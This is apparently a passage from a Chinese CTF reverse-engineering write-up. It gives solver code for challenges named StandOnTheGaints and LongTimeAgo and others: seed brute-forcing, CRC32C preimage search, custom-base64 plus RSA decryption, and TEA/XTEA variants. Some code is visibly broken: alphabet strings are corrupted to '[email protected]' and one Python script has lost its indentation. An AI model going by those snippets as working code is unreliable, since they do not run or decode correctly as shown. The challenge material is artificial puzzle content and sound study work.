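    with open("recover_code22", "wb") as f:
        for i, b in enumerate(block_list):
            if paddr == 0x15ab:
                print("HERE: %s" % hex(b.addr))
            f.write(b.code)
            j = get_block_idx(b.left)
            # `is None`: get_block_idx() returns None for an unknown target.  The
            # original `if not j` also treated index 0 (the 0x1000 entry block)
            # as "no successor", silently dropping any edge back to it.
            if j is None:
                left = 0
            elif i >= j:
                # backward edge: over this block's two jumps and every block
                # from the target up to (not including) this one
                left = len(b.code) + 6
                for ii in range(j, i):
                    left += len(block_list[ii].code)+12
                left = -left
            else:
                # forward edge: over the remaining jump and the blocks in between
                left = 6
                for ii in range(i+1, j):
                    left += len(block_list[ii].code)+12

            jmp_flag = 0
            k = get_block_idx(b.right)
            if k is None:
                right = 0
            elif i >= k:
                right = len(b.code) + 12
                for ii in range(k, i):
                    right += len(block_list[ii].code)+12
                right = -right
            else:
                right = 0
                jmp_flag = 1   # a forward right edge of 0 is legitimate (k == i+1: fall-through)
                for ii in range(i+1, k):
                    right += len(block_list[ii].code)+12

            # Derive a missing edge from the other one; both missing is reported
            # and made visible with an out-of-range displacement.
            if left == 0 and right != 0:
                left = right + 6
            elif left != 0 and right == 0 and jmp_flag == 0:
                right = left - 6
            elif left == 0 and right == 0:
                left = 5000
                right = 5000
                print("\\nERROR")
                print(hex(b.addr), end="")

            f.write(b"\\x0f\\x85") # 0f 85 = jne rel32 (the edge done() calls "Jz")
            f.write((DWORD(left )).to_bytes(4, "little"))
            f.write(b"\\x0f\\x84") # 0f 84 = je rel32 (the edge done() calls "Jnz")
            f.write((DWORD(right)).to_bytes(4, "little"))
            paddr += len(b.code)+12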

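    def done():
        """Interactive lookup: read hex addresses from stdin and, for the
        recovered block containing each one, print its two successor addresses.

        Only malformed input is retried; EOF ends the loop (the original bare
        `except:` also swallowed EOFError and KeyboardInterrupt, spinning
        forever once stdin was closed).
        """
        while True:
            try:
                addr = int(input(), base=16)
            except ValueError:
                continue
            except EOFError:
                return
            for b in block_list:
                # +12 covers the two 6-byte jumps appended after each block
                if b.addr <= addr < b.addr + b.size + 12:
                    print("Jz :0x%x" % b.left)
                    print("Jnz :0x%x" % b.right)
                    break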
  • 爆破 time(0)

    #include "ida.h"
    #include "stdio.h"
    #include "stdlib.h"
    #include "time.h"

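    /* Brute-force window: `now` is the reference timestamp and `range` the number
     * of seconds to scan backwards (main() divides both by 0xe10 = 3600). */
    size_t now = 0x60c5c238;
    size_t range = 0xF0C0*2;
    /* Generator state shared by set_number()/get_number(). */
    size_t xx;

    /* Seed the generator. */
    void set_number(size_t n)
    {
    xx = n;
    }

    /* Advance the generator one step (affine step with the constants taken
     * from the binary, wrapping at the width of size_t) and return the new
     * state.  The unused copy of the old state was removed. */
    size_t get_number()
    {
    xx = 0x756E69636F726E03 * xx + 0xBADC0DEC001CAFE;
    return xx;
    }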

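    /* Replay the binary's 256-round mixing of candidate seed `n` (the generator
     * is re-seeded with the same constant every call) and compare with the
     * expected value.  Prints the mixed value (and, on a hit, "YES" and n) like
     * the original; returns 1 on a match instead of calling exit(0), so the
     * `if (test(i))` in main() is no longer dead.  Format strings use %zx
     * because the values are size_t.  __ROL8__ comes from ida.h. */
    int test(size_t n)
    {
    size_t i, t1, t2, x;
    x = n;
    set_number(0x7177625F32303231);
    for (i = 0; i != 256; ++i)
    {
    t1 = get_number();
    t2 = get_number(); // readfsqword
    x = __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13);
    if ((i & 1) != 0)
    x = t2 ^ (t1 + x);
    if ((i & 2) != 0)
    x ^= t1 + t2;
    if ((i & 4) != 0)
    x ^= t2 ^ t1;
    if ((i & 8) != 0)
    x += t1 + t2;
    }
    printf("0x%zx", x);
    if (x == 0x1C986C3B22EA63E5){
    printf("\\nYES\\n");
    printf("0x%zx", n);
    return 1;
    }
    return 0;
    }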

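    /* Run the same 256-round mixing for j = 0..31 from a different seed, printing
     * the low byte of (v0 + x) for each j as a Python-style list; v0 is one extra
     * generator output drawn before each round set.  The value is cast to
     * unsigned to match the %u conversion (it was a size_t before). */
    int test2()
    {
    size_t i, j, t1, t2, x;
    size_t v0;
    printf("[");
    set_number(0x5249415452455451);
    for (j = 0; j != 32; j++){
    v0 = get_number();
    x = j;
    for (i = 0; i != 256; ++i)
    {
    t1 = get_number();
    t2 = get_number(); // readfsqword
    x = __ROL8__((x ^ t1) + t2 + 33 * x + 1, 13);
    if ((i & 1) != 0)
    x = t2 ^ (t1 + x);
    if ((i & 2) != 0)
    x ^= t1 + t2;
    if ((i & 4) != 0)
    x ^= t2 ^ t1;
    if ((i & 8) != 0)
    x += t1 + t2;
    }
    printf("%u,", (unsigned)((v0 + x)&0xFF));
    }
    printf("]");
    return 0;
    }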

    /* Entry point.  As written it only runs test2() and returns: everything
     * after `return 0;` is unreachable (the author's toggle between the byte
     * dump and the time(0) brute force).  The loop below scans hour-granular
     * candidates (0xe10 = 3600 s) from (now - range) up to now, printing a
     * progress fraction, and stops at the first candidate test() accepts. */
    int main()
    {
    test2();
    return 0;
    //test(0x0000000060C58B03/0xe10);
    for (size_t i = (now-range)/0xe10; i < now/0xe10; i++)
    {
    float p = (float)(i-(float)(now-range)/0xe10)/(float)(range/0xe10);
    printf("\\r%llx\\t%f", i, p);
    if (test(i))
    {
    printf("YES %llx", i);
    exit(0);
    }
    }
    printf("FAILED\\n");
    }
  • 爆破 crc32

    #include <stdio.h>
    #include <stdint.h>
    #include <x86intrin.h>

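    /* Target CRC-32C values (one per 32-bit word of the ciphertext). */
    size_t data[8] = {299650393, 691998794, 68510124, 1960587641, 1360326369, 875761003, 4117139363, 485610796};

    /* For each target, scan every 32-bit input for one whose _mm_crc32_u32(0, i)
     * matches and print the first hit.  The counter is 64-bit: with an
     * `unsigned int i`, `i <= 0xffffffff` is always true, so a target with no
     * preimage made the original loop run forever.  Needs SSE4.2 (-msse4.2). */
    int main(int argc, char *argv[]) {
    (void)argc;
    (void)argv;
    for (int j=0; j<8; j++){
    int found = 0;
    for (uint64_t i = 0; i <= 0xffffffffULL; i++) {
    unsigned int res = _mm_crc32_u32(0, (unsigned int)i);
    if (res == data[j]) {
    printf("0x%08x,", (unsigned int)i);
    found = 1;
    break;
    }
    }
    if (!found)
    printf("none,");
    }
    return 0;
    }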
  • solve 脚本

    import struct
    cipher = [0x3EC81D9432CEF584, 0xB649A4DCD6BD24FE, 0xC5927F0B767A787D, 0x1F245B7F751BB52E]
    xor_data = [0x178DEC4F232DDB6E, 0xC2AAB7D6D2A167C3, 0xF1AB91F72761A80F, 0x3DCEDC28076C41A]
    rand_num = 0x6e191
    xor_data2 = [165,220,121,181,173,29,65,7,237,84,204,183,178,23,228,173,33,228,94,150,235,53,196,224,80,127,120,95,136,104,38,98]

    # Stage 1: strip the 64-bit XOR layer, reinterpret the four qwords as eight
    # little-endian dwords and remove the additive constant.  The printed dwords
    # are the CRC targets that the C brute force above searches preimages for.
    unmasked = [c ^ k for c, k in zip(cipher, xor_data)]
    as_dwords = struct.unpack("<8L", struct.pack("<4Q", *unmasked))
    cipher = [d - rand_num for d in as_dwords]
    print(cipher)

    # Stage 2: the eight preimages (presumably the brute-force output, pasted by
    # hand), split into 32 bytes and XORed with the final byte key.
    cipher = [0xd218b0c3,0x65366cd6,0x85fc66b2,0xc1944883,0xe1019d40,0xbfac4182,0x3c111125,0x1f481ae7]
    cipher = list(struct.unpack("<32B", struct.pack("<8L", *cipher)))
    for byte, key in zip(cipher, xor_data2):
        print(chr(byte ^ key), end="")

StandOnTheGaints

// JNI entry for MainActivity.check(String) (decompiled, 32-bit ARM).  a1 is the
// JNIEnv*, a2 the jobject (unused), a3 the jstring to check.  Returns the raw
// strcmp() result, i.e. 0 when the input is accepted.
int __fastcall Java_com_a_standonthegiants_MainActivity_check(int a1, int a2, int a3)
{
  int ptr; // r6
  const char *input; // r8
  size_t len; // r4
  int v7; // r2
  _BYTE *input__; // r10
  int input_; // r5
  _QWORD *ctx; // r11
  int i; // r0
  int v12; // r0
  int *num_3; // r5
  int len_; // r0
  unsigned __int8 *v15; // r4
  int len_1; // r10
  unsigned __int8 *out; // r5
  int v18; // r4
  int v21; // [sp+10h] [bp-110h] BYREF
  int v22; // [sp+14h] [bp-10Ch]
  _DWORD *num_2; // [sp+1Ch] [bp-104h] BYREF
  _DWORD *num_1; // [sp+20h] [bp-100h] BYREF
  _DWORD *input_0; // [sp+24h] [bp-FCh] BYREF
  char v26[216]; // [sp+28h] [bp-F8h] BYREF

  ptr = 0;
  // JNIEnv table slot 676/4 = 169 on a 32-bit table, i.e. GetStringUTFChars(env, str, NULL).
  input = (const char *)(*(int (__fastcall **)(int, int, _DWORD))(*(_DWORD *)a1 + 676))(a1, a3, 0);
  len = strlen(input);
  // Two output bytes per input character (+4 slack): the loop below advances the
  // destination by 2 per byte, which looks like hex *encoding* despite the
  // "unhex" label — confirm in sub_52318.  v7 is passed uninitialised
  // (decompiler artefact; presumably an ignored argument).
  input__ = malloc(2 * len + 4);
  input_ = (int)input__;
  while ( len != ptr )
  {
    sub_52318(input_, -1, v7, (unsigned __int8)input[ptr]);// unhex
    input_ += 2;
    ++ptr;
  }
  // Big-number context; input_0 = the encoded input parsed as a BIGNUM via trans().
  ctx = BN_CTX_new_ex();
  sub_5249C((int)ctx);
  input_0 = BN_POOL_get(ctx);
  trans(&input_0, input__); // get input_0
  free(input__);
  num_1 = BN_POOL_get(ctx);
  num_2 = BN_POOL_get(ctx);
  // num_1: 0xD1 bytes of unk_2C6B0 de-obfuscated with XOR '=' (0x3D) — the RSA
  // modulus the solve script below reconstructs the same way.
  qmemcpy(v26, &unk_2C6B0, 0xD1u);
  for ( i = 0; i != 209; ++i )
    v26[i] ^= '=';
  trans(&num_1, v26); // get num_1
  memset(v26, 0, 0xD1u);
  // num_2: six zero bytes XOR '0' give "000000"; incrementing byte 1 of v21 and
  // byte 1 of v22 (byte 5 overall) turns it into "010001", i.e. e = 0x10001.
  v12 = 0;
  v21 = 0;
  v22 = 0;
  while ( v12 != 6 )
    *((_BYTE *)&v21 + v12++) ^= '0';
  ++BYTE1(v21);
  ++BYTE1(v22);
  trans(&num_2, &v21); // get num_2
  v21 = 0;
  v22 = 0;
  num_3 = BN_POOL_get(ctx);
  // RSA encryption of the input with (e, n) = (num_2, num_1).
  BN_mod_exp((int)num_3, (int)input_0, (int)num_2, (int)num_1, (int)ctx);// num_3=input_0^num_2%num_1
  // Serialise num_3 big-endian ((len_ + 7) / 8 suggests len_ is a bit count),
  // encode with the custom base64-style encode() and compare with the constant.
  len_ = sub_565A8(num_3);
  v15 = (unsigned __int8 *)malloc((len_ + 7) / 8);
  len_1 = BN_bn2bin((int)num_3, (int)v15);
  sub_525B8(ctx);
  sub_523E8(ctx);
  out = (unsigned __int8 *)calloc(3u, len_1);
  encode(v15, out, len_1, 0);
  free(v15);
  v18 = strcmp(
          "bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG"
          "+/lmqEysrTdSD+eP+moP+l?+Np/oK=",
          (const char *)out);
  free(out);
  // Slot 680/4 = 170: ReleaseStringUTFChars(env, str, input).
  (*(void (__fastcall **)(int, int, const char *))(*(_DWORD *)a1 + 680))(a1, a3, input);
  return v18;
}

编译出来检查一下确实是 base64 变种

#include <cstdio>

char st[]="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-";

// Unsigned integer division helper (mirrors the binary's own routine).
unsigned int __fastcall div(unsigned int a1, unsigned int a2){
  unsigned int quotient = a1 / a2;
  return quotient;
}

// Variant base64 encoder (decompiled).  Encodes `len` bytes of `in` into `out`
// with the alphabet `st`; when out == NULL only the required length is
// returned.  a4 != 0 enables a line-wrapping mode that inserts '\n' (10).
// Returns the number of output bytes written (or required).
// The printf("(%d/%d)", ...) inside the loop looks like a progress print the
// author added while checking the routine, not part of the original binary.
int __fastcall encode(unsigned __int8 *in, unsigned __int8 *out, unsigned int len, int a4)
{
  unsigned int v8; // r0
  int v9; // r9
  unsigned int v10; // r6
  int v11; // r8
  int v12; // r4
  unsigned __int8 *v13; // r2
  int v14; // r1   (unused)
  unsigned __int8 *v15; // r1
  unsigned __int8 v16; // r0
  unsigned __int8 *v17; // r2
  unsigned __int8 v18; // r0
  unsigned int v20; // [sp+0h] [bp-28h]
  int v21; // [sp+4h] [bp-24h]
  unsigned int v22; // [sp+8h] [bp-20h]

  v8 = div(len, 3u);     // number of complete 3-byte groups
  v22 = 3 * v8;          // input bytes covered by complete groups
  if ( out )
  {
    v20 = len - 3 * v8;  // leftover bytes: 0, 1 or 2
    v21 = a4;            // wrap flag
    v9 = 0;              // output index
    v10 = 0;             // input index
    v11 = 0;             // newlines written so far
    while ( v10 < v22 )
    {
      printf("(%d/%d)",v10,v22);
      v12 = v9 + 4;
      // Standard 3-bytes -> 4-symbols split.  The & 0xFFFFFFCF / & 0xFFFFFFC3
      // masks are no-ops on the shifted byte values (decompiler artefacts).
      out[v9] = st[in[v10] >> 2];
      v13 = &out[v9];
      v13[1] = st[(in[v10 + 1] >> 4) & 0xFFFFFFCF | (16 * (in[v10] & 3))];
      v13[2] = st[(in[v10 + 2] >> 6) & 0xFFFFFFC3 | (4 * (in[v10 + 1] & 0xF))];
      v13[3] = st[in[v10 + 2] & 0x3F];
      // Wrap mode as decompiled: a newline is written when div(v9+4-v11, 76) is
      // zero.  NOTE(review): that fires on the first group and stops once the
      // quotient is nonzero, which looks inverted (a `%` may have been lost);
      // main() below calls with a4 = 0 so this branch is never exercised.
      if ( !v21 || div(v9 + 4 - v11, 76))
      {
        v9 += 4;
      }
      else
      {
        v9 += 5;
        ++v11;
        out[v12] = 10;
      }
      v10 += 3;
    }
    // Tail: two leftover bytes -> three symbols + '=' (61); one -> two symbols + "==".
    if ( v20 == 2 )
    {
      out[v9] = st[in[v10] >> 2];
      v17 = &out[v9];
      v17[1] = st[(in[v10 + 1] >> 4) & 0xFFFFFFCF | (16 * (in[v10] & 3))];
      v18 = in[v10 + 1];
      v17[3] = 61;
      v17[2] = st[4 * (v18 & 0xF)];
      goto LABEL_17;
    }
    if ( v20 == 1 )
    {
      v15 = &out[v9];
      out[v9] = st[in[v10] >> 2];
      v16 = in[v10];
      v15[2] = 0x3D;
      v15[3] = 0x3D;
      v15[1] = st[16 * (v16 & 3)];
LABEL_17:
      v9 += 4;
      return v9;
    }
  }
  else
  {
    // Length-only mode: 4 symbols per group, one extra group if len is not a
    // multiple of 3, plus one newline per 57 input bytes (= 76 output chars) when wrapping.
    v9 = 4 * v8 + 4;
    if ( len == 3 * v8 )
      v9 = 4 * v8;
    if ( a4 )
      v9 += div(len, 57u);
  }
  return v9;
}
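// The 104 bytes produced by the app's BN_bn2bin() step (the RSA ciphertext).
unsigned char in[]={4,19,145,162,221,78,30,13,54,187,174,253,228,107,226,107,61,246,79,93,101,3,50,168,68,175,46,10,202,36,143,195,247,143,85,84,178,127,58,19,105,2,231,193,247,58,31,58,77,49,206,67,44,172,164,253,243,115,92,150,235,66,81,94,150,12,131,42,57,165,87,104,136,133,103,201,53,99,242,98,52,130,13,121,44,196,30,97,36,109,14,199,117,18,157,76,58,157,75,243,89,207,228,233};
// Output capacity: four symbols per three input bytes (rounded up) plus the
// NUL terminator.  The original `char out[100]` together with a hard-coded
// len of 150 read past the end of `in` (104 bytes) and wrote 200 bytes into a
// 100-byte buffer.
char out[4 * ((sizeof(in) + 2) / 3) + 1];
int main(){
  // Encode exactly the bytes in `in`; a4 = 0 disables line wrapping.  104 bytes
  // leave a 2-byte tail, which is why the expected string ends in a single '='.
  int t=encode((unsigned char*)in,(unsigned char*)out,(unsigned int)sizeof(in),0);
  printf("%d\\n",t);
  printf("%s",out);
}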

base64变种解密

import base64
import binascii

# `a` is the app's custom alphabet, `b` the standard base64 alphabet at the same
# positions (both with '=' appended), `s` the string the native check compares
# against.  NOTE(review): the "[email protected]" run inside `a` looks like the
# page's e-mail obfuscation and presumably replaced the real symbols there;
# any character of `s` missing from `a` maps through a.find() == -1 to '='.
a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-="
b=("ABCDEFGHIJKLMNOPQRSTUVWXYZ"
   "abcdefghijklmnopqrstuvwxyz"
   "0123456789+/=")
s=("bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO"
   "/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK=")
# Translate each symbol of `s` to the standard alphabet (a.find() == -1 falls
# back to the last entry of `b`, i.e. '='), then base64-decode and hex-dump.
c = "".join(b[a.find(symbol)] for symbol in s)
print(c)
q = base64.b64decode(c)
print(binascii.hexlify(q))

RSA分解解密

#include <cstdio>
#include <openssl/bn.h>
#include <openssl/crypto.h>

// The 0xD1-byte blob the app XORs with '=' (0x3D) to obtain the modulus as a
// hex string; the final 0x3D therefore becomes the NUL terminator after
// de-obfuscation in main() below.
unsigned char s1[] =
{
0x0C, 0x0E, 0x0F, 0x0C, 0x79, 0x0F, 0x7B, 0x79, 0x79, 0x79,
0x78, 0x05, 0x7F, 0x79, 0x04, 0x79, 0x7B, 0x7B, 0x0E, 0x0A,
0x04, 0x7C, 0x7B, 0x7B, 0x0D, 0x0E, 0x0D, 0x79, 0x78, 0x0F,
0x0D, 0x08, 0x7F, 0x05, 0x09, 0x0B, 0x78, 0x7F, 0x08, 0x7E,
0x78, 0x7E, 0x7E, 0x09, 0x0D, 0x7B, 0x7C, 0x05, 0x7C, 0x7C,
0x04, 0x7E, 0x0F, 0x7C, 0x05, 0x08, 0x7E, 0x78, 0x0E, 0x78,
0x04, 0x04, 0x0F, 0x0C, 0x04, 0x0E, 0x78, 0x05, 0x0A, 0x0E,
0x7F, 0x0F, 0x7F, 0x7E, 0x0B, 0x0B, 0x0A, 0x79, 0x7C, 0x7F,
0x78, 0x0F, 0x7C, 0x7E, 0x0E, 0x78, 0x78, 0x04, 0x79, 0x79,
0x0F, 0x0E, 0x7F, 0x0E, 0x7C, 0x04, 0x78, 0x79, 0x04, 0x78,
0x7E, 0x0D, 0x7E, 0x0E, 0x7E, 0x0A, 0x09, 0x09, 0x08, 0x0B,
0x0B, 0x0E, 0x7B, 0x08, 0x09, 0x08, 0x08, 0x09, 0x0B, 0x04,
0x7F, 0x0A, 0x0F, 0x0A, 0x79, 0x79, 0x0B, 0x7B, 0x7F, 0x7E,
0x0D, 0x0E, 0x7F, 0x0C, 0x7F, 0x7B, 0x04, 0x08, 0x79, 0x0D,
0x0E, 0x7C, 0x0C, 0x0E, 0x7E, 0x0D, 0x0E, 0x0B, 0x05, 0x0B,
0x09, 0x08, 0x0A, 0x0B, 0x0A, 0x0B, 0x0E, 0x0D, 0x7E, 0x0A,
0x78, 0x7C, 0x7F, 0x7B, 0x08, 0x78, 0x0A, 0x7C, 0x7F, 0x08,
0x7B, 0x7C, 0x0F, 0x0A, 0x7F, 0x04, 0x09, 0x7C, 0x79, 0x78,
0x0A, 0x78, 0x0C, 0x78, 0x0F, 0x0E, 0x7F, 0x7E, 0x7E, 0x0B,
0x08, 0x79, 0x0F, 0x7C, 0x0A, 0x79, 0x78, 0x79, 0x0C, 0x7E,
0x08, 0x7F, 0x0E, 0x0B, 0x09, 0x7F, 0x08, 0x0C, 0x3D,
};

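// Print a labelled BIGNUM in decimal or hex.  BN_bn2dec/BN_bn2hex return a heap string the
// caller must release with OPENSSL_free(); the original listing leaked every one of them.
static void print_bn(const char *label, const BIGNUM *x, bool as_hex) {
    char *str = as_hex ? BN_bn2hex(x) : BN_bn2dec(x);
    if (str == nullptr) {
        fprintf(stderr, "%s: conversion failed\n", label);
        return;
    }
    printf("%s:%s\n", label, str);
    OPENSSL_free(str);
}

// Textbook RSA decryption with the recovered factors: phi = (p-1)(q-1), d = e^-1 mod phi,
// m = c^d mod n.  Every OpenSSL call is checked; returns 0 on success, 1 on any failure.
// (The "\\n" in the original printf calls was a page-escaping artifact: they printed a
// literal backslash-n instead of a newline.)
int main(){
    int rc = 1;
    BN_CTX *bn_ctx = BN_CTX_new();
    BIGNUM *c = BN_new(), *n = BN_new(), *e = BN_new();
    BIGNUM *p_1 = BN_new(), *q_1 = BN_new();
    BIGNUM *d = BN_new(), *phi = BN_new(), *m = BN_new();
    if (!bn_ctx || !c || !n || !e || !p_1 || !q_1 || !d || !phi || !m) {
        fprintf(stderr, "BN allocation failed\n");
        goto done;
    }

    // Ciphertext as dumped from the binary (hex).
    if (!BN_hex2bn(&c, "041391a2dd4e1e0d36bbaefde46be26b3df64f5d650332a844af2e0aca248fc3f78f5554b27f3a136902e7c1f73a1f3a4d31ce432caca4fdf3735c96eb42515e960c832a39a55768888567c93563f26234820d792cc41e61246d0ec775129d4c3a9d4bf359cfe4e9")) {
        fprintf(stderr, "bad ciphertext\n");
        goto done;
    }

    // n is stored XOR-masked with 0x3D; unmasking the final 0x3D yields the NUL terminator,
    // so after this loop s1 is a C string holding n in hex.  sizeof s1 == 0xD1.
    for (size_t i = 0; i < sizeof s1; i++) s1[i] ^= 0x3D;
    printf("s1:%s\n", s1);
    if (!BN_hex2bn(&n, (const char*)s1)) {
        fprintf(stderr, "bad modulus\n");
        goto done;
    }

    // Public exponent 0x10001 = 65537.
    if (!BN_hex2bn(&e, "010001")) {
        fprintf(stderr, "bad exponent\n");
        goto done;
    }

    //c=m^e%n
    print_bn("c", c, false);
    print_bn("n", n, false);
    print_bn("e", e, false);

    // p-1 and q-1 from the factoring step (the factors themselves are one higher):
    //p=33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062711
    //q=64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853367
    if (!BN_dec2bn(&p_1, "33372027594978156556226010605355114227940760344767554666784520987023841729210037080257448673296881877565718986258036932062710") ||
        !BN_dec2bn(&q_1, "64135289477071580278790190170577389084825014742943447208116859632024532344630238623598752668347708737661925585694639798853366")) {
        fprintf(stderr, "bad factors\n");
        goto done;
    }
    // The original labelled these "p"/"q" although the variables hold p-1 and q-1.
    print_bn("p-1", p_1, false);
    print_bn("q-1", q_1, false);

    // phi = (p-1)(q-1); d = e^-1 mod phi.  BN_mod_inverse returns NULL if e and phi are
    // not coprime, which the original never checked before using d.
    if (!BN_mul(phi, p_1, q_1, bn_ctx) || BN_mod_inverse(d, e, phi, bn_ctx) == nullptr) {
        fprintf(stderr, "cannot compute private exponent\n");
        goto done;
    }
    print_bn("phi", phi, false);
    print_bn("d", d, false);

    if (!BN_mod_exp(m, c, d, n, bn_ctx)) {
        fprintf(stderr, "modexp failed\n");
        goto done;
    }
    print_bn("c", c, true);
    print_bn("m", m, true);
    rc = 0;

done:
    // BN_free()/BN_CTX_free() accept NULL, so partial allocation is handled uniformly.
    BN_free(m); BN_free(phi); BN_free(d);
    BN_free(q_1); BN_free(p_1);
    BN_free(e); BN_free(n); BN_free(c);
    BN_CTX_free(bn_ctx);
    return rc;
}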
m:092C636F75222F948E6C6D30F6B8CD61E8896860CEE9A590873B503588892FCB5C2B53228DC5FE4A8D198D4F4077358097B738A6927211296967A45E2F68DF863967D0A6DFC06D2ABB878C1856E9E984CFC78270F8CF6438E17ADCD9823780B860B1835C585CADBE
c:041391A2DD4E1E0D36BBAEFDE46BE26B3DF64F5D650332A844AF2E0ACA248FC3F78F5554B27F3A136902E7C1F73A1F3A4D31CE432CACA4FDF3735C96EB42515E960C832A39A55768888567C93563F26234820D792CC41E61246D0EC775129D4C3A9D4BF359CFE4E9
f:bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK=

上调试机动态调了好多次,算法肯定没问题

直接patch传入明文m进去加密一路right

可能是有反调试?或者脑洞?

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-

常量表里 `+` 和 `-` 各出现了两次(上面那张 64 字符的表),所以密文中每个 `+`/`-` 都对应两个可能的下标,用 `find` 只取第一个下标时有一半位置会映射错,解出来的 m 自然不对。做法是把表里第二次出现的 `+`/`-` 换成占位符 `$`/`#`,再对密文里每个 `+`/`-` 枚举“原字符 / 占位符”两种取值(这段密文里共 14 处,最多 2^14 种组合),逐个做 RSA 解密,用明文是否足够短(hex 长度小于 200,即前导字节为 0)来筛出正确的那一组。

解题脚本

import base64
import binascii

#a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]+-="
a="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*+,-./:;[email protected]$#="
b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
s="bborOT+ohG*,U:;@/gVIAZ-,t++LaZkOrk?UcSOKJ?p-J+vuSN?:e,Kc/?h-oH?:tthoqYYSPp-ZC+Yw:*jrxPymGYO/PvDOIivNYtvJ?Mi*GG+/lmqEysrTdSD+eP+moP+l?+Np/oK="

n=2140324650240744961264423072839333563008614715144755017797754920881418023447140136643345519095804679610992851872470914587687396261921557363047454770520805119056493106687691590019759405693457452230589325976697471681738069364894699871578494975937497937
d=1219002363472329316632678572665837077877528004905520939230037996503041169769564562618818603930146413036298872224725717654149810234132887053185714832075764978825457518728410705223332728199047961645304133836997233492855592278022423674340390891560261753
e=65537

def test(c):
c=c.translate(str.maketrans(a,b))
c=base64.b64decode(c)
c=int.from_bytes(c,byteorder='big',signed=False)
m=pow(c,d,n)
mx=hex(m)
if (len(mx)<200):
print(mx)
m=m.to_bytes(length=0x68,byteorder='big',signed=False)
print(m)
input()

l=[]
for index,i in enumerate(s):
if i in '+-':
l.append(index)

p=list(s)
tr={"+":"$","-":"#"}

def enum(dep,ch):
if (ch):
p[l[dep]]=tr[s[l[dep]]]
else:
p[l[dep]]=s[l[dep]]
if (dep==0):
print(''.join(p))
test(''.join(p))
else:
enum(dep-1,0)
enum(dep-1,1)

enum(len(l)-1,0)
enum(len(l)-1,1)

LongTimeAgo

#include "stdio.h"
#include "stdint.h"

//0x8F3779E9
/*
 * XTEA decryption, 32 rounds, decrypting the 64-bit block v[0..1] in place with key[0..3].
 * Identical to the reference XTEA decipher routine except for the delta constant: the
 * binary uses 0x8F3779E9 instead of the standard 0x9E3779B9.
 */
void xtea_decrypt(uint32_t v[2], uint32_t const key[4]) {
    const uint32_t delta = 0x8F3779E9;
    uint32_t y = v[0];
    uint32_t z = v[1];
    uint32_t sum = delta * 32u;          /* sum after 32 encryption rounds */

    for (unsigned round = 0; round < 32; round++) {
        z -= (((y << 4) ^ (y >> 5)) + y) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        y -= (((z << 4) ^ (z >> 5)) + z) ^ (sum + key[sum & 3]);
    }

    v[0] = y;
    v[1] = z;
}

//0x3D3529BC
/*
 * TEA decryption, 32 rounds, decrypting v[0..1] in place with the 128-bit key k[0..3].
 * Mirrors the reference TEA decipher routine except that the binary's delta is 0x3D3529BC
 * rather than the standard 0x9E3779B9.
 */
void tea_decrypt (uint32_t* v, uint32_t* k) {
    const uint32_t delta = 0x3D3529BC;
    const uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
    uint32_t y = v[0];
    uint32_t z = v[1];
    uint32_t sum = delta * 32;           /* sum after 32 encryption rounds */
    int rounds_left = 32;

    while (rounds_left-- > 0) {
        z -= ((y << 4) + k2) ^ (y + sum) ^ ((y >> 5) + k3);
        y -= ((z << 4) + k0) ^ (z + sum) ^ ((z >> 5) + k1);
        sum -= delta;
    }

    v[0] = y;
    v[1] = z;
}

/* Eight 32-bit ciphertext words (four 64-bit blocks) dumped from the binary; main() XOR-unmasks
 * them in pairs and decrypts blocks 0-1 with xtea_decrypt() and blocks 2-3 with tea_decrypt().
 * The array must be referenced by this exact name (`cher`). */
unsigned int cher[8] = {
    0x1F306772, 0xB75B0C29, 0x4A7CDBE3, 0x2877BDDF, 0x1354C485, 0x357C3C3A, 0x738AF06C, 0x89B7F537
};
/* 128-bit key shared by both ciphers, as found in the binary. */
unsigned int key[4] = {
    0xFFFD, 0x1FFFD, 0x3FFFD, 0x7FFFD
};

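/*
 * Unmask and decrypt the four ciphertext blocks and print them as 16 hex digits each.
 * Fix: the listing referenced an undeclared `cipher` array while the data is declared as
 * `cher`, so it did not compile; it also printed no trailing newline and had no return value.
 */
int main(){
    uint32_t v[2];

    /* Blocks 0 and 1: XOR masks 0xfd / 0x1fd, then the XTEA variant. */
    v[0] = cher[0] ^ 0xfd;
    v[1] = cher[1] ^ 0x1fd;
    xtea_decrypt(v, key);
    printf("%08x%08x", (unsigned)v[0], (unsigned)v[1]);

    v[0] = cher[2] ^ 0xfd;
    v[1] = cher[3] ^ 0x1fd;
    xtea_decrypt(v, key);
    printf("%08x%08x", (unsigned)v[0], (unsigned)v[1]);

    /* Blocks 2 and 3: XOR masks 0x3fd / 0x7fd, then the TEA variant. */
    v[0] = cher[4] ^ 0x3fd;
    v[1] = cher[5] ^ 0x7fd;
    tea_decrypt(v, key);
    printf("%08x%08x", (unsigned)v[0], (unsigned)v[1]);

    v[0] = cher[6] ^ 0x3fd;
    v[1] = cher[7] ^ 0x7fd;
    tea_decrypt(v, key);
    printf("%08x%08x", (unsigned)v[0], (unsigned)v[1]);

    putchar('\n');
    return 0;
}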

